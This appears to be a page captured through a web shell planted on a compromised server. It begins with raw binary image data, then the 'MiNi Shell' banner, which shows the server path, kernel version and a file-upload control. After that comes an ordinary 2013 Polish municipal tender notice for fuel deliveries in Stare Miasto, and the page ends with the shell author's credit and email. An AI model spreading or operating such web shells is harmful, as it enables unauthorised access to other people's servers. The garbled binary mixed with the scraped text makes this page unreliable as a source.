JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130117/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130117/24678-N-2013.html

<p class="kh_header"><b>Stare Miasto: Dostawa paliwa, poprzez tankowanie z dystrybutora paliwa dla pojazdów Zakładu Gospodarki Komunalnej w Starym Mieście</b><br>
<b>Numer ogłoszenia: 24678 - 2013; data zamieszczenia: 17.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Stare Miasto , ul. Główna 16b, 62-571 Stare Miasto, woj. wielkopolskie, tel. 063 2416216, faks 063 2416580.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.stare-miasto.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: ZAKŁAD GOSPODARKI KOMUNALNEJ W STARYM MIEŚCIE.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paliwa, poprzez tankowanie z dystrybutora paliwa dla pojazdów Zakładu Gospodarki Komunalnej w Starym Mieście.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1) Przedmiotem zamówienia jest dostawa paliw płynnych (tankowanie pojazdów Zakładu Gospodarki Komunalnej w Starym Mieście przez Dostawcę stacji paliw):
a) oleju napędowego w ilości - 59 600 litrów
b) benzyny bezołowiowej Pb 95 w ilości - 3 500 litrów
w systemie umożliwiającym bezgotówkowy zakup i okresowe rozliczanie na podstawie faktury zbiorczej./jeden raz w miesiącu/
Wielkość zamówienia określona powyżej stanowi oszacowany limit potrzeb Zamawiającego do 31.12.2013r.
Procedura wydawania paliwa będzie przebiegała następująco:
Zamawiający sporządzi i przedłoży Dostawcy imienną listę osób upoważnionych do odbioru paliwa oraz wykaz samochodów do których tankowane będzie paliwo. Upoważnione osoby przez zamawiającego będą zobowiązane do pokwitowania wydanego paliwa na karcie wydania.
2) Realizacja zamówień na sukcesywne dostawy paliw do pojazdów służbowych Zamawiającego odbywać się będzie poprzez bezpośrednie tankowanie do zbiorników paliwa sprzętu silnikowego na stacjach benzynowych należących do wyłonionego w postępowaniu wykonawcy. Tankowanie paliwa  do kanistrów odbywać się będzie na podstawie pisemnego upoważnienia Zamawiającego.
3) Realizacja umowy odbywać się będzie na podstawie ilości faktycznie zatankowanych paliw  płynnych  w cenie obowiązującej w danym dniu, do kwoty zabezpieczonej na ten cel w budżecie Zamawiającego na rok 2013.
W przypadku wyczerpania środków budżetu na rok 2013, przewidzianych na realizację w/w dostawy, Zamawiający zgodnie z zapisami SIWZ - rozdział V, przewiduje udzielenie zamówień tożsamych - uzupełniających w ilości max. 20% zamówienia.
4) Dostawca zapewni paliwa płynne będące przedmiotem niniejszego postępowania zgodne z obowiązującymi normami określonymi w Rozporządzeniu Ministra Gospodarki z dnia 09.12.2008r. w sprawie wymagań jakościowych dla paliw ciekłych (DZ. U. z 2008, Nr 221, poz. 1441).
5) Dostawca zapewni najbliższą stację paliw znajdującą się w odległości nie większej niż 10 km  od siedziby Zakładu Gospodarki Komunalnej (ul. Parkowa 17 Żychlin), czynną przez 7 dni tygodniu i przez 24 godziny na dobę.
6) Paliwo może być pobierane do pojazdów z poza wykazu na podstawie pisemnego upoważnienia.
7) Ewidencja ilościowa pobranego paliwa do pojazdów jaki i kanistrów odbywać się będzie na podstawie dokumentu WZ bądź realizowanych przez stacje paliw kart bezgotówkowych.
8) Przedmiotowe stacje, które realizują karty bezgotówkowe zobowiązane są do:
- wydania nieodpłatnie karty do zakupów, na podstawie których Zamawiający będzie dokonywał rozliczeń w systemie bezgotówkowym w ilości zgodnej z zamówieniem Zamawiającego.
- Dostawca wyda karty, o których mowa powyżej w ciągu 2 dni od daty podpisania umowy.
- W razie zgubienia lub kradzieży którejkolwiek z wydanych kart Dostawca po zgłoszeniu tego faktu przez Zamawiającego dokona natychmiastowego zablokowania karty.
- W przypadku zaistnienia okoliczności, o której mowa powyżej Dostawca wyda duplikat karty lub dokona wymiany karty zniszczonej za opłatą (wynikająca z tabeli opłat Wykonawcy) nie później niż  w ciągu 7 dni roboczych.
- Na wniosek Zamawiającego Dostawca wyda nieodpłatnie karty do nowo zakupionych pojazdów.
- Zamawiający nie dopuszcza możliwości realizacji transakcji bezgotówkowych w granicach limitów dla każdej karty paliwowej.
- Po zakończeniu umowy Zamawiający zwróci Dostawcy wydane karty.
9) Zamawiający może nie wykorzystać podanego limitu w pkt. 1 oraz  20% zamówienia uzupełniającego zamawianego oleju napędowego i benzyny bezołowiowej 95 do końca trwania umowy.
10) Przedmiotowe stacje nie realizujące kart bezgotówkowych zobowiązane są do:
- wydania dowodu WZ i wypełnienia karty na której zamieszcza następujące dane:
a) imię i nazwisko kierowcy, który paliwo pobrał
b)datę i godzinę tankowania
c)ilość faktycznie pobranego paliwa
d) nr rejestracyjny pojazdu.
11) Sposób rozliczania należności: 
- Dostawca określi cenę oferty jako cenę brutto za 1 litr oleju napędowego/benzyny z uwzględnieniem podatków, ściśle według formularza ofertowego, uwzględniając wszelkie koszty wynikające z realizacji zamówienia. Cena oferty i jej składniki cenotwórcze (cena producenta, marża lub opust dostawcy) powinny zostać określone z dokładnością do drugiego miejsca po przecinku. Rozliczenia z wybranym Dostawcą dokonywane będą w walucie polskiej.
- Sposób obliczenia ceny oferty: Cenę oferty Dostawca zobowiązany jest obliczyć na podstawie ceny  brutto producenta oleju napędowego/benzyny oraz zaoferowanej przez Dostawcę marży brutto stałej lub stałego opustu Dostawcy w danym dniu dostawy.
- W ofercie należy podać wiarygodne i niezależne źródło pozyskania informacji na temat ceny producenta oleju napędowego/benzyny (adres strony internetowej; nazwę, adres i telefon giełdy paliwowej), w celu umożliwienia Zamawiającemu jej weryfikacji. Zgodnie z art. 24 ust. 2 pkt. 3 ustawy Prawo zamówień publicznych Zamawiający wykluczy z udziału w postępowaniu Dostawcę, który złoży nieprawdziwe  informacje mające wpływ lub mogące mieć wpływ na wynik prowadzonego postępowania.
- Obliczona cena oferty posłuży Zamawiającemu do wyboru najkorzystniejszej oferty i zamówienia pierwszej dostawy oleju napędowego/benzyny. 
Przy obliczaniu ceny kolejnej dostawy oleju napędowego/benzyny będzie przyjmowana  za podstawę cena brutto producenta oleju napędowego/benzyny na dzień tankowania przez Zamawiającego, podana w jego cenniku oraz zaoferowana przez Dostawcę/Dostawców w niniejszej ofercie stała marża brutto lub stały opust .
- Pierwsza dostawa (tankowanie) odbywało by się po cenie zawartej w formularzu ofertowym
- Zapłata należności z tytułu sprzedaży paliw będących przedmiotem niniejszego postępowania będzie dokonywana przez Zamawiającego w oparciu o ilość.
- Faktury za transakcje dokonane przez Zamawiającego z użyciem kart bezgotówkowych bądź WZ, wystawiane będą przez Wykonawcę raz w miesiącu, po zakończeniu każdego z okresów rozliczeniowych i wysłane/dostarczone Zamawiającemu (nie później niż w ciągu 3 dni) wraz z wydrukiem zestawienia transakcji dokonanych w danym okresie rozliczeniowym zawierającym:
	a) nr karty bądź nr dowodu WZ, na którą dokonano zakupu, 
	b) nr rejestracyjny pojazdu,
	c) datę i godzinę dokonania zakupu,
	d) ilość zakupionego paliwa,
- Płatności należności z tytułu sprzedaży paliw dokonywane będą przez Zamawiającego w formie przelewu na wskazane konto Dostawcy w ciągu 14  dni od daty doręczenia faktury.
- Faktury będą wystawiane za pełny okres rozliczeniowy i obejmować będą należności z tytułu sprzedaży paliw dokonanej w tym okresie na rzecz Zamawiającego. 
- W danym miesiącu ustala się 1 lub 2 okresy rozliczeniowe. 
- Za dzień sprzedaży uznaje się ostatni dzień danego okresu rozliczeniowego. 
- Zamawiający zapłaci Dostawcy wynagrodzenie za faktycznie pobrane paliwa..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, o których mowa w art. 67 ust. 1 pkt. 7 ustawy Prawo Zamówień Publicznych w ilości max. 20% wartości zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 09.10.00.00-0, 09.13.21.00-4, 09.13.41.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania - nalezy załączyć do oferty wypełniony i podpisany Załącznik nr 1. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące posiadania wiedzy i doświadczenia - nalezy załączyć do oferty wypełniony i podpisany Załącznik nr 1. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania odpowiednim potencjałem technicznym - nalezy załączyć do oferty wypełniony i podpisany Załącznik nr 1. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące dysponowania osobami zdolnymi do wykonania zamówienia - nalezy załączyć do oferty wypełniony i podpisany Załącznik nr 1. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące sytuacji ekonomicznej i finansowej - nalezy załączyć do oferty wypełniony i podpisany Załącznik nr 1. Ocena spełniania warunków udziału w postępowaniu będzie dokonana na zasadzie spełnia/nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Formularz oferty - zalącznik nr 2
2. Wykaz stacji paliw - załącznik nr 5</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość zmiany umowy w następujących przypadkach, gdy:   
- z powodu uzasadnionych zmian w zakresie sposobu wykonania przedmiotu zamówienia 
proponowanych przez zamawiającego lub wykonawcę , jeżeli te zmiany są korzystne dla zamawiającego.
- z powodu wystąpienia dodatkowych okoliczności, niemożliwych do przewidzenia przed zawarciem umowy,
- z powodu okoliczności siły wyższej np. wystąpienia zdarzenia losowego wywołanego przez czynniki zewnętrzne, którego nie można było przewidzieć, 
w szczególności zagrażającego bezpośrednio życiu lub zdrowiu ludzi lub grożącego powstaniem szkody w dużych rozmiarach,
- z powodu działań osób trzecich uniemożliwiających wykonanie prac, które to działania nie są konsekwencją winy którejkolwiek ze stron,</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.stare-miasto.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Stare Miasto
ul. Główna 16b
62-571 Stare Miasto.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.01.2013 godzina 10:00, miejsce: Urząd Gminy Stare Miasto
ul. Główna 16b
62-571 Stare Miasto
(sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com